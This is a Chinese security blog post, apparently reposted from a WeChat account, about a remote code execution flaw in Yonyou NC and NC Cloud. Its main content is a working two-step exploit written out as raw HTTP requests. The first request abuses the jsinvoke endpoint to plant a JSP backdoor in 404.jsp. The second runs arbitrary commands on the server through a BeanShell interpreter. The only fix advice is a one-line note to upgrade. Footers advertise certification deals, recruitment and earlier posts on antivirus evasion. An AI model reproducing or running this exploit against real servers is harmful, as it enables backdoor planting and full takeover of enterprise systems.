【漏洞速递 | Day】某友RCE漏洞(附EXP)

admin 2023年7月24日14:28:37评论233 views字数 2860阅读9分32秒阅读模式

0x01 前言

    用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。

【漏洞速递 | Day】某友RCE漏洞(附EXP)

    用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。

0x02 漏洞等级

高危


0x03 漏洞影响

NC63、NC633、NC65NC Cloud1903、NC Cloud1909NC Cloud2005、NC Cloud2105、NC Cloud2111YonBIP高级版2207


0x04 漏洞复现

用友nc-cloud---这个熟悉的界面~~~

【漏洞速递 | Day】某友RCE漏洞(附EXP)

EXP:

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1Host: 127.0.0.1:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: cookiets=168170496; JSESSIONID=33A343770FF.serverIf-None-Match: W/"1571-1589211696000"If-Modified-Since: Mon, 11 May 2020 15:41:36 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 249
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}

【漏洞速递 | Day】某友RCE漏洞(附EXP)

POST /404.jsp?error=bsh.Interpreter HTTP/1.1Host: 127.0.0.1:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: cookiets=1681785232226; JSESSIONID=334D3ED07A343770FF.serverIf-None-Match: W/"1571-1589211696000"If-Modified-Since: Mon, 11 May 2020 15:41:36 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 104
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ping 8.8.8.8").getInputStream())

【漏洞速递 | Day】某友RCE漏洞(附EXP)

0x05 修复建议

    官方已经发布修复补丁,请进行升级。

【漏洞速递 | Day】某友RCE漏洞(附EXP)

网 安 考 证【漏洞速递 | Day】某友RCE漏洞(附EXP)

需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜

CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...

【漏洞速递 | Day】某友RCE漏洞(附EXP)

高薪内推 | 2023国HVV来了!大量招人中···

内推通道👇 

http://gywa.com.cn/hsqXti

报名投递简历时记得备注【渗透Xiao白帽】可优先直推面试~

也可阅读原文报名或扫描上方二维码邀请进群交流~

【漏洞速递 | Day】某友RCE漏洞(附EXP)

23hvv红蓝py交流群,共享资源 一起py【漏洞速递 | Day】某友RCE漏洞(附EXP) 

不定期福利赠送

群满可以后台加vx备注py 邀请进群【漏洞速递 | Day】某友RCE漏洞(附EXP)

【漏洞速递 | Day】某友RCE漏洞(附EXP)


【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细 | 钟馗之眼】ZoomEye-python命令行的使用

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

  记一次HW实战笔记 | 艰难的提权爬坑

走过路过的大佬们留个关注再走呗【漏洞速递 | Day】某友RCE漏洞(附EXP)

往期文章有彩蛋哦【漏洞速递 | Day】某友RCE漏洞(附EXP)


原文始发于微信公众号(渗透Xiao白帽):【漏洞速递 | Day】某友RCE漏洞(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月24日14:28:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞速递 | Day】某友RCE漏洞(附EXP)https://cn-sec.com/archives/1902465.html

发表评论

匿名网友 填写信息